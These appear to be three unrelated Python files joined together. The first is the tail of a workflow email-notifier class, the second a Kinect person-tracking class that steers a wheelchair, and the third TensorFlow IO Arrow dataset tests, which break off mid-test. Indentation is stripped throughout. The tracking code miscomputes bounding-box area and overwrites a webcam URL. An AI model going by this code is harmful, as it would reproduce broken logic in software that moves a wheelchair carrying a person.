except Exception as err:
_logger.error("Failed to send email {0}".format(args.get('msg')))
q.task_done()
def send_email(self, subject, body, to, cc=None):
msg = Message(From=self._from, To=to, Subject=self._env_name + ' - ' + subject, Body=body, CC=cc)
if self._suppress_send:
_logger.info('email suppressed: subject=%s' % msg.Subject)
return
self._email_queue.put({
'msg': msg,
'mail_sender': self._mailer.send,
'debug': self._debug
})
def send_error_email(self, subject, body, to=None):
cc = None
if to:
cc = self._cc_on_error
else:
to = self._cc_on_error
self.send_email(subject, body, to, cc=cc)
def extract_action_messages(self, action, datastore):
values = dict(action_id=action.id,
action_type_name=action.data.action_type_name,
datastore_id=datastore.id,
datastore_name=datastore.data.name,
entity_link='',
action_err_msg=action.data.error_message,
action_batch_job_id=action.data.batch_job_id,
action_ecs_task_arn=action.data.ecs_task_arn,
workflow_id=action.data.workflow_id,
workflow_instance_id=action.data.workflow_instance_id,
engine_name=action.data.engine_name)
subject = '{action_status} Dart: action (action_id={action_id}, action_type_name={action_type_name})'
message = """
action (action_id={action_id}, action_type_name={action_type_name}) {action_status}
for datastore (datastore_id={datastore_id}, datastore_name={datastore_name})
{entity_link}
action_err_msg={action_err_msg}
workflow_id={workflow_id}, workflow_instance_id={workflow_instance_id}
batch_job_id={action_batch_job_id}, action_ecs_task_arn={action_ecs_task_arn}, engine={engine_name}"""
return (values, subject, message)
def send_action_failed_email(self, action, datastore):
values, subject, message = self.extract_action_messages(action, datastore)
values.update({'action_status': 'FAILED'})
values.update({'entity_link': self.get_entity_link('actions', action.id)})
self.send_error_email(
subject.format(**values),
dedent(message.format(**values)),
action.data.on_failure_email
)
def send_action_completed_email(self, action, datastore):
values, subject, message = self.extract_action_messages(action, datastore)
values.update({'action_status': 'COMPLETED'})
self.send_email(
subject.format(**values),
dedent(message.format(**values)),
action.data.on_success_email
)
def send_workflow_failed_email(self, workflow, wf_instance):
values = (workflow.id, workflow.data.name, wf_instance.id, self.get_workflow_manager_link(workflow.id),
wf_instance.data.error_message)
self.send_error_email(
'FAILED Dart: workflow (id=%s, name=%s)' % (workflow.id, workflow.data.name),
'workflow (id=%s, name=%s) FAILED for instance (id=%s)\n\n%s\n\n%s' % values,
workflow.data.on_failure_email
)
def send_workflow_completed_email(self, workflow, wf_instance):
values = (workflow.id, workflow.data.name, wf_instance.id, self.get_workflow_manager_link(workflow.id))
self.send_email(
'COMPLETED Dart: workflow (id=%s, name=%s)' % (workflow.id, workflow.data.name),
'workflow (id=%s, name=%s) COMPLETED for instance (id=%s)\n\n%s' % values,
workflow.data.on_success_email
)
def send_workflow_started_email(self, workflow, wf_instance):
values = (workflow.id, workflow.data.name, wf_instance.id, self.get_workflow_manager_link(workflow.id))
self.send_email(
'STARTED Dart: workflow (id=%s, name=%s)' % (workflow.id, workflow.data.name),
'workflow (id=%s, name=%s) has STARTED: instance (id=%s)\n\n%s' % values,
workflow.data.on_started_email
)
def send_subscription_failed_email(self, subscription):
values = (subscription.id, subscription.data.name, self.get_entity_link('subscriptions', subscription.id))
self.send_error_email(
'FAILED Dart: subscription (id=%s, name=%s)' % (subscription.id, subscription.data.name),
'subscription (id=%s, name=%s) FAILED\n\n%s' % values,
subscription.data.on_failure_email
)
def send_subscription_completed_email(self, subscription):
values = (subscription.id, subscription.data.name, self.get_entity_link('subscriptions', subscription.id))
self.send_email(
'COMPLETED Dart: subscription (id=%s, name=%s)' % (subscription.id, subscription.data.name),
'subscription (id=%s, name=%s) COMPLETED\n\n%s' % values,
subscription.data.on_success_email
)
|
personTracking.py
|
#NAME: personTracking.py
#DATE: 08/02/2019
#AUTH: Ryan McCartney, EEE Undergraduate, Queen's University Belfast
#DESC: A python class for tracking people data streamed from a kinect camera
#COPY: Copyright 2018, All Rights Reserved, Ryan McCartney
import threading
import numpy as np
import cv2 as cv
import time
import math
import imutils
import numba as nb
from datetime import datetime
from urllib.request import urlopen
from imutils.object_detection import non_max_suppression
from control import Control
from imutils import paths
#define threading wrapper
def threaded(fn):
def wrapper(*args, **kwargs):
thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
class PersonTracking:
frameWidth = 640
green = (0,255,0)
red = (0,0,255)
blue = (255,0,0)
purple = (205,50,219)
def __init__(self,configuration):
self.status = True
#Load Configuration Variables
try:
self.kinectDepth_url = configuration['streams']['kinectDepth']['url']
self.kinectDepth_name = configuration['streams']['kinectDepth']['name']
self.kinectImage_url = configuration['streams']['kinectRGB']['url']
self.kinectImage_name = configuration['streams']['kinectRGB']['name']
self.webcam_url = configuration['streams']['webcam']['url']
self.webcam_url = configuration['streams']['webcam']['name']
self.fps = configuration['general']['fps']
self.maxSpeed = configuration['control']['maxSpeed']
self.minAngle = configuration['control']['minAngle']
self.maxAngle = configuration['control']['maxAngle']
#Get the details of the log file from the configuration
logFilePath = configuration['general']['logFileDirectory']
logFileName = configuration['general']['logFileName']
self.logFileFullPath = logFilePath + logFileName
self.logging = True
#Open log file
try:
self.log("INFO = Person Tracking Class has accessed log file.")
except:
self.logging = False
except:
self.log("ERROR = The configuration file cannot be decoded.")
self.status = False
#Try Initialising the control class
try:
self.wheelchair = Control(configuration)
self.log("INFO = Control Established.")
except:
self.log("ERROR = Control Class could not be initiated.")
self.status = False
#Initialising some options with Default values
self.collisionDetection = False
self.retrieveFrames = False
self.tracking = False
self.nms = True
self.displayStream = True
self.showClock = False
self.showFPS = False
self.info = False
#Initialize the HOG descriptor/person detector
self.hog = cv.HOGDescriptor()
self.hog.setSVMDetector(cv.HOGDescriptor_getDefaultPeopleDetector())
#Allow opencv to capture the stream
self.image = cv.VideoCapture(self.kinectImage_url)
self.depth = cv.VideoCapture(self.kinectDepth_url)
def log(self, entry):
currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S")
logEntry = currentDateTime + ": " + entry
if self.logging == True:
#open a txt file to use for logging
logFile = open(self.logFileFullPath,"a+")
logFile.write(logEntry+"\n")
logFile.close()
print(logEntry)
@threaded
def trackPeople(self):
command = "SEND"
self.retrieveFrames = True
delay = 1/self.fps
self.fpsProcessing = 0
self.tracking = True
while self.tracking:
#Start Timing
start = time.time()
imageFrame, depthFrame = self.getFrames()
#Detect People
boundingBoxes, personCentres = self.detectPeople(imageFrame)
#Add Bounding Boxes
frame = self.addBoundingBoxes(imageFrame,boundingBoxes,self.green)
#Add the Goal Position
frame, goalPosition = self.addGoal(frame,self.purple)
if len(boundingBoxes) > 0:
self.log("INFO = Tacking "+str(len(boundingBoxes))+" people.")
frame = self.addText(frame,"Tracking Active",self.red)
#Add Crosshair Markers
frame = self.addMarker(frame,personCentres,self.green)
#In an image with multiple people select a person to follow
personPosition, boundingBox = self.selectPerson(boundingBoxes, personCentres)
#Add Crosshair and Bounding Box for Target person
frame = self.addMarker(frame,[personPosition],self.red)
frame = self.addBoundingBoxes(frame,[boundingBox],self.red)
#Determine Image Size
width = frame.shape[1]
height = frame.shape[0]
speed = self.calcSpeed(personPosition,depthFrame)
angle = self.calcAngle(goalPosition,personPosition,height,width)
#Collision Prevention
if self.collisionDetection == True:
frame = self.collisionPrevention(frame,depthFrame)
text = "Speed adjusted to "+str(speed)+" and angle to "+str(angle)
font = cv.FONT_HERSHEY_SIMPLEX
cv.putText(frame,text,(16,68), font, 0.6,(0,0,255),1,cv.LINE_AA)
#Move the wheelchair
self.wheelchair.transmitCommand(speed,angle,command)
if self.info == True:
self.log("INFO = The Speed is set to "+str(speed)+" and the Angle is set as "+str(angle))
else:
self.wheelchair.transmitCommand(0,0,"RUN")
frame = self.addText(frame,"No People to Track",self.green)
text = "Speed adjusted to "+str(0)+" and angle to "+str(0)
font = cv.FONT_HERSHEY_SIMPLEX
cv.putText(frame,text,(16,68), font, 0.6,(0,255,0),1,cv.LINE_AA)
if self.showClock == True:
frame = self.addClock(frame)
if self.showFPS == True:
frame = self.addFPS(frame,self.fpsProcessing)
if self.displayStream == True:
#Show the frame
cv.imshow('Stream of {}'.format(self.kinectImage_name),frame)
#Calculate FPS
end = time.time()
adjustedDelay = delay-(end-start)
if adjustedDelay < 0:
adjustedDelay = 0
self.fpsProcessing = 1/(end-start)
else:
self.fpsProcessing = self.fps
# quit program when 'esc' key is pressed
if cv.waitKey(1) & 0xFF == ord('q'):
self.status = False
break
time.sleep(adjustedDelay)
self.retrieveFrames = False
self.tracking = False
cv.destroyAllWindows()
#Collision Prevention
def collisionPrevention(self, imageFrame, depthFrame):
closestPoint = self.scanImage(depthFrame)
closestObject = self.distanceCalc(closestPoint[0])
self.wheelchair.calcMaxSpeed(closestObject)
point = (closestPoint[1],closestPoint[2])
imageFrame = self.addMarker(imageFrame,point,self.blue)
return imageFrame
def getFrames(self):
returned, depthFrame = self.depth.read()
returned, imageFrame = self.image.read()
if returned == False:
self.log("ERROR = Cannot Access Vision API.")
depthFrame = cv.imread('testing/personTracking/nostream.jpg',cv.IMREAD_COLOR)
imageFrame = cv.imread('testing/personTracking/nostream.jpg',cv.IMREAD_COLOR)
#Convert Depth Image to Grayscale
depthFrame = cv.cvtColor(depthFrame, cv.COLOR_BGR2GRAY)
imageFrame = imutils.resize(imageFrame, width=self.frameWidth)
depthFrame = imutils.resize(depthFrame, width=self.frameWidth)
return imageFrame, depthFrame
@staticmethod
def addClock(frame):
#Add clock to the frame
font = cv.FONT_HERSHEY_SIMPLEX
currentDateTime = datetime.now().strftime("%d/%m/%Y %H:%M:%S.%f")
cv.putText(frame,currentDateTime,(16,20), font, 0.6,(255,0,0),1,cv.LINE_AA)
return frame
@staticmethod
def addFPS(frame,fps):
#Add clock to the frame
font = cv.FONT_HERSHEY_SIMPLEX
text = '%.2ffps'%round(fps,2)
cv.putText(frame,text,(16,44), font, 0.6,(255,0,0),1,cv.LINE_AA)
return frame
@staticmethod
def addText(frame,text,colour):
#Add clock to the frame
font = cv.FONT_HERSHEY_SIMPLEX
cv.putText(frame,text,(16,90), font, 0.6,colour,1,cv.LINE_AA)
return frame
def detectPeople(self,image):
#Detect people in the passed image
(boundingBoxes, weights) = self.hog.detectMultiScale(image, winStride=(4, 4), padding=(4, 4), scale=1.2)
boxes = len(boundingBoxes)
if self.nms == True:
boundingBoxes = self.applyNMS(boundingBoxes)
boxesNMA = len(boundingBoxes)
if self.info == True:
if self.nms == True:
#Show additional info
print("INFO = {}: {} original boxes, {} after suppression".format(self.kinectImage_name, boxes, boxesNMA))
else:
#Show additional info
print("INFO = {}: {} bounding boxes".format(self.kinectImage_name,boxes))
if len(boundingBoxes) > 0:
i = 0
personCentres = []
for (xA, yA, xB, yB) in boundingBoxes:
x = int(((xB -xA)/2) + xA)
y = int(((yB -yA)/2) + yA)
personCentres.insert(i,(x,y))
i = i + 1
else:
personCentres = 0
return boundingBoxes, personCentres
@staticmethod
def applyNMS(boundingBoxes):
#Applying NMS
boundingBoxes = np.array([[x, y, x + w, y + h] for (x, y, w, h) in boundingBoxes])
NMAboundingBoxes = non_max_suppression(boundingBoxes, probs=None, overlapThresh=0.65)
return NMAboundingBoxes
@staticmethod
def addMarker(image,points,colour):
crosshairHeight = 20
crosshairWidth = 20
for (x, y) in points:
#Horizontal Line & Vertical Line on Video Image
cv.line(image,((x-crosshairWidth),y),((x+crosshairWidth),y),colour,2)
cv.line(image,(x,(y-crosshairHeight)),(x,(y+crosshairHeight)),colour,2)
return image
@staticmethod
def addBoundingBoxes(image,boxes,colour):
#Draw boxes without NMS
for (xA, yA, xB, yB) in boxes:
cv.rectangle(image, (xA, yA), (xB, yB),colour, 2)
return image
@staticmethod
def addGoal(image,colour):
offset = 0
crosshairHeight = 50
crosshairWidth = 50
width = image.shape[1]
height = image.shape[0]
goalWidth = int((width/2) - offset)
goalHeight = int((height/2) - offset)
goalPosition = [goalHeight, goalWidth]
#Horizontal Line & Vertical Line on Video Image
cv.line(image,((goalWidth-crosshairWidth),goalHeight),((goalWidth+crosshairWidth),goalHeight),colour,2)
cv.line(image,(goalWidth,(goalHeight-crosshairHeight)),(goalWidth,(goalHeight+crosshairHeight)),colour,2)
return image, goalPosition
#Determine Angle
def calcAngle(self,goalPositon,personPosition,height,width):
xG = goalPositon[0]
xP = personPosition[0]
mappingRange = width/2
if xP > xG:
angle = self.maxAngle * ((xP-mappingRange)/mappingRange)
elif xP < xG:
angle = self.minAngle * ((mappingRange-xP)/mappingRange)
else:
angle = 0
angle = int(angle)
return angle
#Determine Speed
def calcSpeed(self,personPosition,depthFrame):
personDistance = self.calcPersonDistance(personPosition,depthFrame)
self.log("INFO = Target is "+str(round(personDistance,4))+"m away.")
if personDistance < 0.2:
speed = 0
elif personDistance >=0.2:
speed = 10+int(5*personDistance)
if speed > self.maxSpeed:
speed = self.maxSpeed
return speed
#Providing the Location of a person, returns their distance away
def calcPersonDistance(self,personPosition,depthFrame):
x = personPosition[1]
y = personPosition[0]
depthFrame = cv.medianBlur(depthFrame,5)
depthValue = depthFrame[x,y]
distance = self.distanceCalc(depthValue)
return distance
#Returns infomraiton about how far away a point is in and image
@staticmethod
def distanceCalc(depth):
a = -0.0000000069
b = 0.0000064344
c = -0.0019066199
d = 0.2331614352
e = -9.5744837865
#Second Order Custom Estimation
distance = (a*math.pow(depth,4))+(b*math.pow(depth,3))+(c*math.pow(depth,2))+(d*depth)+e
if distance < 0:
distance = 0
return distance
#In image with multiple people, select a target
@staticmethod
def selectPerson(boundingBoxes,personCentres):
box = 0
largestArea = 0
person = 0
#Draw bounding boxes with NMS
for (xA, yA, xB, yB) in boundingBoxes:
boxArea = (xB-xA)*(yB*yA)
if boxArea > largestArea:
person = box
largestArea = boxArea
box = box + 1
personPosition = personCentres[person]
boundingBox = boundingBoxes[person]
return personPosition, boundingBox
#Optimised method for finding the closest point in an image
@staticmethod
@nb.jit(nopython=True)
def scanImage(depthData):
height = len(depthData)
width = len(depthData[0])
#Initialise with worst case
pointValue = 2048
pointHeight = 0
pointWidth = 0
#Threshold for dealing with annomolies (reflective surfaces)
threshold = 0
#Populate Array with Data
for h in range (0,height):
for w in range (0,width):
if (depthData[h,w] <= pointValue) and (depthData[h,w] >= threshold):
pointValue = depthData[h,w]
pointHeight = h
pointWidth = w
results = [pointValue, pointWidth, pointHeight]
return results
|
test_arrow.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
# ==============================================================================
"""Tests for ArrowDataset."""
from collections import namedtuple
import io
import os
import socket
import tempfile
import threading
import pytest
import pyarrow as pa
import numpy.testing as npt
import tensorflow as tf
import tensorflow_io as tfio
TruthData = namedtuple("TruthData", ["data", "output_types", "output_shapes"])
class ArrowTestBase(tf.test.TestCase):
"""ArrowTestBase"""
@classmethod
def setUpClass(cls): # pylint: disable=invalid-name
"""setUpClass"""
cls.scalar_data = [
[True, False, True, True],
[1, 2, -3, 4],
[1, 2, -3, 4],
[1, 2, -3, 4],
[1, 2, -3, 4],
[1, 2, 3, 4],
[1, 2, 3, 4],
[1, 2, 3, 4],
[1, 2, 3, 4],
[1.1, 2.2, 3.3, 4.4],
[1.1, 2.2, 3.3, 4.4],
]
cls.scalar_dtypes = (
tf.dtypes.bool,
tf.dtypes.int8,
tf.dtypes.int16,
tf.dtypes.int32,
tf.dtypes.int64,
tf.dtypes.uint8,
tf.dtypes.uint16,
tf.dtypes.uint32,
tf.dtypes.uint64,
tf.dtypes.float32,
tf.dtypes.float64,
)
cls.scalar_shapes = tuple([tf.TensorShape([]) for _ in cls.scalar_dtypes])
cls.list_fixed_data = [
[[1, 1], [2, 2], [3, 3], [4, 4]],
[[1, 1], [2, 2], [3, 3], [4, 4]],
[[1.1, 1.1], [2.2, 2.2], [3.3, 3.3], [4.4, 4.4]],
[[1.1, 1.1], [2.2, 2.2], [3.3, 3.3], [4.4, 4.4]],
]
cls.list_fixed_dtypes = (
tf.dtypes.int32,
tf.dtypes.int64,
tf.dtypes.float32,
tf.dtypes.float64,
)
cls.list_fixed_shapes = tuple(
[tf.TensorShape([None]) for _ in cls.list_fixed_dtypes]
)
cls.list_var_data = [
[[1], [2, 2], [3, 3, 3], [4, 4, 4]],
[[1.1], [2.2, 2.2], [3.3, 3.3, 3.3], [4.4, 4.4, 4.4]],
]
cls.list_var_dtypes = (tf.dtypes.int32, tf.dtypes.float32)
cls.list_var_shapes = (tf.TensorShape([None]), tf.TensorShape([None]))
cls.list_data = cls.list_fixed_data + cls.list_var_data
cls.list_dtypes = cls.list_fixed_dtypes + cls.list_var_dtypes
cls.list_shapes = cls.list_fixed_shapes + cls.list_var_shapes
def get_arrow_type(self, dt, is_list):
"""get_arrow_type"""
if dt == tf.dtypes.bool:
arrow_type = pa.bool_()
elif dt == tf.dtypes.int8:
arrow_type = pa.int8()
elif dt == tf.dtypes.int16:
arrow_type = pa.int16()
elif dt == tf.dtypes.int32:
arrow_type = pa.int32()
elif dt == tf.dtypes.int64:
arrow_type = pa.int64()
elif dt == tf.dtypes.uint8:
arrow_type = pa.uint8()
elif dt == tf.dtypes.uint16:
arrow_type = pa.uint16()
elif dt == tf.dtypes.uint32:
arrow_type = pa.uint32()
elif dt == tf.dtypes.uint64:
arrow_type = pa.uint64()
elif dt == tf.dtypes.float16:
arrow_type = pa.float16()
elif dt == tf.dtypes.float32:
arrow_type = pa.float32()
elif dt == tf.dtypes.float64:
arrow_type = pa.float64()
elif dt == tf.dtypes.string:
arrow_type = pa.string()
else:
raise TypeError("Unsupported dtype for Arrow" + str(dt))
if is_list:
arrow_type = pa.list_(arrow_type)
return arrow_type
def make_record_batch(self, truth_data):
"""Make an Arrow RecordBatch for given test data"""
arrays = [
pa.array(
truth_data.data[col],
type=self.get_arrow_type(
truth_data.output_types[col],
isinstance(truth_data.data[col][0], list),
),
)
for col in range(len(truth_data.output_types))
]
names = ["{}_[{}]".format(i, a.type) for i, a in enumerate(arrays)]
return pa.RecordBatch.from_arrays(arrays, names)
class ArrowIOTensorTest(ArrowTestBase):
"""ArrowIOTensorTest"""
@classmethod
def setUpClass(cls): # pylint: disable=invalid-name
"""setUpClass"""
super().setUpClass()
cls.scalar_shapes = tuple([tf.TensorShape([len(c)]) for c in cls.scalar_data])
cls.list_fixed_shapes = tuple(
[tf.TensorShape([len(c), len(c[0])]) for c in cls.list_fixed_data]
)
def make_table(self, truth_data):
"""make_table"""
batch = self.make_record_batch(truth_data)
return pa.Table.from_batches([batch])
def run_test_case(self, iot, truth_data, columns):
"""run_test_case"""
self.assertEqual(iot.columns, columns)
for i, column in enumerate(columns):
iot_col = iot(column)
self.assertEqual(iot_col.dtype, truth_data.output_types[i])
self.assertEqual(iot_col.shape, truth_data.output_shapes[i])
npt.assert_almost_equal(iot_col.to_tensor().numpy(), truth_data.data[i])
def test_arrow_io_tensor_scalar(self):
"""test_arrow_io_tensor_scalar"""
truth_data = TruthData(self.scalar_data, self.scalar_dtypes, self.scalar_shapes)
table = self.make_table(truth_data)
iot = tfio.IOTensor.from_arrow(table)
self.run_test_case(iot, truth_data, table.column_names)
def test_arrow_io_tensor_lists(self):
"""test_arrow_io_tensor_lists"""
truth_data = TruthData(
self.list_fixed_data, self.list_fixed_dtypes, self.list_fixed_shapes
)
table = self.make_table(truth_data)
iot = tfio.IOTensor.from_arrow(table)
self.run_test_case(iot, truth_data, table.column_names)
def test_arrow_io_tensor_mixed(self):
"""test_arrow_io_tensor_mixed"""
truth_data = TruthData(
self.scalar_data + self.list_fixed_data,
self.scalar_dtypes + self.list_fixed_dtypes,
self.scalar_shapes + self.list_fixed_shapes,
)
table = self.make_table(truth_data)
iot = tfio.IOTensor.from_arrow(table)
self.run_test_case(iot, truth_data, table.column_names)
def test_arrow_io_tensor_chunked(self):
"""test_arrow_io_tensor_chunked"""
num_chunks = 2
chunk_data = TruthData(
self.scalar_data + self.list_fixed_data,
self.scalar_dtypes + self.list_fixed_dtypes,
self.scalar_shapes + self.list_fixed_shapes,
)
# Make a table with double the data for 2 chunks
table = self.make_table(chunk_data)
table = pa.concat_tables([table] * num_chunks)
# Double the batch size of the truth data
output_shapes = self.scalar_shapes + self.list_fixed_shapes
output_shapes = [
tf.TensorShape([d + d if i == 0 else d for i, d in enumerate(shape)])
for shape in output_shapes
]
truth_data = TruthData(
[d * num_chunks for d in chunk_data.data],
self.scalar_dtypes + self.list_fixed_dtypes,
output_shapes,
)
self.assertGreater(table[0].num_chunks, 1)
iot = tfio.IOTensor.from_arrow(table)
self.run_test_case(iot, truth_data, table.column_names)
def test_arrow_io_dataset_map_from_file(self):
"""test_arrow_io_dataset_map_from_file"""
column = "a"
dtype = tf.dtypes.int64
column_dtype = self.get_arrow_type(dtype, False)
arr = pa.array(list(range(100)), column_dtype)
table = pa.Table.from_arrays([arr], [column])
spec = {column: dtype}
with tempfile.NamedTemporaryFile(delete=False) as f:
with pa.RecordBatchFileWriter(f.name, table.schema) as writer:
for batch in table.to_batches():
writer.write_batch(batch)
def from_file(_):
reader = pa.RecordBatchFileReader(f.name)
t = reader.read_all()
tio = tfio.IOTensor.from_arrow(t, spec=spec)
return tio(column).to_tensor()
num_iters = 2
ds = tf.data.Dataset.range(num_iters).map(from_file)
expected = table[column].to_pylist()
iter_count = 0
for result in ds:
npt.assert_array_equal(result, expected)
iter_count += 1
self.assertEqual(iter_count, num_iters)
os.unlink(f.name)
def test_arrow_io_dataset_map_py_func(self):
"""test_arrow_io_dataset_map_from_py_func"""
column = "a"
dtype = tf.dtypes.int64
column_dtype = self.get_arrow_type(dtype, False)
arr = pa.array(list(range(100)), column_dtype)
table = pa.Table.from_arrays([arr], [column])
spec = {column: dtype}
with tempfile.NamedTemporaryFile(delete=False) as f:
with pa.RecordBatchFileWriter(f.name, table.schema) as writer:
for batch in table.to_batches():
writer.write_batch(batch)
def read_table(filename):
filename = filename.numpy().decode("utf-8")
reader = pa.RecordBatchFileReader(filename)
return reader.read_all()
def from_py_func(filename):
from tensorflow_io.python.ops.arrow_io_tensor_ops import ArrowIOResource
table_res = ArrowIOResource.from_py_function(read_table, [filename])
tio = tfio.IOTensor.from_arrow(table_res, spec=spec)
return tio(column).to_tensor()
num_iters = 2
ds = tf.data.Dataset.from_tensor_slices([f.name, f.name]).map(from_py_func)
expected = table[column].to_pylist()
iter_count = 0
for result in ds:
npt.assert_array_equal(result, expected)
iter_count += 1
self.assertEqual(iter_count, num_iters)
os.unlink(f.name)
def test_spec_selection_by_column_name(self):
"""test_spec_selection_by_column_name"""
def from_func(_):
a = pa.array([1, 2, 3], type=pa.int32())
b = pa.array([4, 5, 6], type=pa.int64())
c = pa.array([7, 8, 9], type=pa.float32())
t = pa.Table.from_arrays([a, b, c], ["a", "b", "c"])
foo = tfio.IOTensor.from_arrow(t, spec={"b": tf.int64})
return foo("b").to_tensor()
ds = tf.data.Dataset.range(1).map(from_func)
results = list(ds.as_numpy_iterator())
self.assertEqual(len(results), 1)
result = results[0]
b = pa.array([4, 5, 6], type=pa.int64())
expected = b.to_numpy()
npt.assert_array_equal(result, expected)
def test_spec_selection_by_column_index(self):
"""test_spec_selection_by_column_index"""
def from_func(_):
a = pa.array([1, 2, 3], type=pa.int32())
b = pa.array([4, 5, 6], type=pa.int64())
c = pa.array([7, 8, 9], type=pa.float32())
t = pa.Table.from_arrays([a, b, c], ["a", "b", "c"])
foo = tfio.IOTensor.from_arrow(t, spec={1: tf.int64})
return foo(1).to_tensor()
ds = tf.data.Dataset.range(1).map(from_func)
results = list(ds.as_numpy_iterator())
self.assertEqual(len(results), 1)
result = results[0]
b = pa.array([4, 5, 6], type=pa.int64())
expected = b.to_numpy()
npt.assert_array_equal(result, expected)
class ArrowDatasetTest(ArrowTestBase):
"""ArrowDatasetTest"""
def run_test_case(self, dataset, truth_data, batch_size=None):
"""run_test_case"""
def is_float(dtype):
"""Check if dtype is a floating-point"""
return dtype in [tf.dtypes.float16, tf.dtypes.float32, tf.dtypes.float64]
def evaluate_result(value):
"""Check the results match truth data"""
for i, col in enumerate(dataset.columns):
if truth_data.output_shapes[col].ndims == 0:
if is_float(truth_data.output_types[col]):
self.assertAlmostEqual(value[i], truth_data.data[col][row], 4)
else:
self.assertEqual(value[i], truth_data.data[col][row])
elif truth_data.output_shapes[col].ndims == 1:
if is_float(truth_data.output_types[col]):
for j, v in enumerate(value[i]):
self.assertAlmostEqual(v, truth_data.data[col][row][j], 4)
else:
self.assertListEqual(
value[i].tolist(), truth_data.data[col][row]
)
# Row counter for each single result or batch of multiple rows
row = 0
# Iterate over the dataset
for results in dataset:
# For batches, iterate over each row in batch or remainder at end
for result_idx in range(batch_size or 1):
# Get a single row value
if batch_size is None:
value = [r.numpy() for r in results]
# Get a batch of values and check 1 row at a time
else:
if result_idx == 0:
value_batch = [r.numpy() for r in results]
# Check for a partial result
if result_idx == value_batch[0].shape[0]:
break
# Get a single row out of the batch
value = [v[result_idx] for v in value_batch]
# Check the result then increment the row counter
evaluate_result(value)
row += 1
# Check that all data was returned by Dataset
self.assertEqual(row, len(truth_data.data[0]))
def test_arrow_dataset(self):
"""test_arrow_dataset"""
import tensorflow_io.arrow as arrow_io
truth_data = TruthData(
self.scalar_data + self.list_data,
self.scalar_dtypes + self.list_dtypes,
self.scalar_shapes + self.list_shapes,
)
batch = self.make_record_batch(truth_data)
# test all columns selected
dataset = arrow_io.ArrowDataset.from_record_batches(
batch, truth_data.output_types, truth_data.output_shapes
)
self.run_test_case(dataset, truth_data)
# test column selection
columns = (1, 3, len(truth_data.output_types) - 1)
dataset = arrow_io.ArrowDataset.from_record_batches(
batch,
tuple([truth_data.output_types[c] for c in columns]),
tuple([truth_data.output_shapes[c] for c in columns]),
columns=columns,
)
self.run_test_case(dataset, truth_data)
# test construction from pd.DataFrame
df = batch.to_pandas()
dataset = arrow_io.ArrowDataset.from_pandas(df, preserve_index=False)
self.run_test_case(dataset, truth_data)
def test_arrow_dataset_with_strings(self):
"""test_arrow_dataset"""
import tensorflow_io.arrow as arrow_io
scalar_data = [
[b"1.1", b"2.2", b"3.3", b"4.4"],
]
scalar_dtypes = (tf.dtypes.string,)
scalar_shapes = tuple([tf.TensorShape([]) for _ in scalar_dtypes])
truth_data = TruthData(scalar_data, scalar_dtypes, scalar_shapes)
batch = self.make_record_batch(truth_data)
# test all columns selected
dataset = arrow_io.ArrowDataset.from_record_batches(
batch, truth_data.output_types, truth_data.output_shapes
)
self.run_test_case(dataset, truth_data)
def test_from_pandas_preserve_index(self):
"""test_from_pandas_preserve_index"""
import tensorflow_io.arrow as arrow_io
data_v = [
[1.0, 2.0, 3.0],
[0.2, 0.4, 0.8],
]
truth_data = TruthData(
data_v,
(tf.dtypes.float32, tf.dtypes.float32),
(tf.TensorShape([]), tf.TensorShape([])),
)
batch = self.make_record_batch(truth_data)
df = batch.to_pandas()
dataset = arrow_io.ArrowDataset.from_pandas(df, preserve_index=True)
# Add index column to test data to check results
truth_data_with_index = TruthData(
truth_data.data + [range(len(truth_data.data[0]))],
truth_data.output_types + (tf.dtypes.int64,),
truth_data.output_shapes + (tf.TensorShape([]),),
)
self.run_test_case(dataset, truth_data_with_index)
# Test preserve_index again, selecting second column only
# NOTE: need to select TruthData because `df` gets selected also
truth_data_selected_with_index = TruthData(
truth_data_with_index.data[1:],
truth_data_with_index.output_types[1:],
truth_data_with_index.output_shapes[1:],
)
dataset = arrow_io.ArrowDataset.from_pandas(
df, columns=(1,), preserve_index=True
)
self.run_test_case(dataset, truth_data_selected_with_index)
def test_arrow_feather_dataset(self):
"""test_arrow_feather_dataset"""
import tensorflow_io.arrow as arrow_io
from pyarrow.feather import write_feather
# Feather files currently do not support columns of list types
truth_data = TruthData(self.scalar_data, self.scalar_dtypes, self.scalar_shapes)
batch = self.make_record_batch(truth_data)
df = batch.to_pandas()
# Create a tempfile that is deleted after tests run
with tempfile.NamedTemporaryFile(delete=False) as f:
write_feather(df, f, version=1)
# test single file
dataset = arrow_io.ArrowFeatherDataset(
f.name,
list(range(len(truth_data.output_types))),
truth_data.output_types,
truth_data.output_shapes,
)
self.run_test_case(dataset, truth_data)
# test single file with 'file://' prefix
dataset = arrow_io.ArrowFeatherDataset(
"file://{}".format(f.name),
list(range(len(truth_data.output_types))),
truth_data.output_types,
truth_data.output_shapes,
)
self.run_test_case(dataset, truth_data)
# test multiple files
dataset = arrow_io.ArrowFeatherDataset(
[f.name, f.name],
list(range(len(truth_data.output_types))),
truth_data.output_types,
truth_data.output_shapes,
)
truth_data_doubled = TruthData(
[d * 2 for d in truth_data.data],
truth_data.output_types,
truth_data.output_shapes,
)
self.run_test_case(dataset, truth_data_doubled)
# test construction from schema
dataset = arrow_io.ArrowFeatherDataset.from_schema(f.name, batch.schema)
self.run_test_case(dataset, truth_data)
os.unlink(f.name)
def test_arrow_socket_dataset(self):
"""test_arrow_socket_dataset"""
import tensorflow_io.arrow as arrow_io
truth_data = TruthData(
self.scalar_data + self.list_data,
self.scalar_dtypes + self.list_dtypes,
self.scalar_shapes + self.list_shapes,
)
batch = self.make_record_batch(truth_data)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("127.0.0.1", 0))
sock.listen(1)
host_addr, port = sock.getsockname()
host = "{}:{}".format(host_addr, port)
def run_server(num_batches):
conn, _ = sock.accept()
outfile = conn.makefile(mode="wb")
writer = pa.RecordBatchStreamWriter(outfile, batch.schema)
for _ in range(num_batches):
writer.write_batch(batch)
writer.close()
outfile.close()
conn.close()
sock.close()
# test with multiple batches, construct from schema
num_batches = 2
server = threading.Thread(target=run_server, args=(num_batches,))
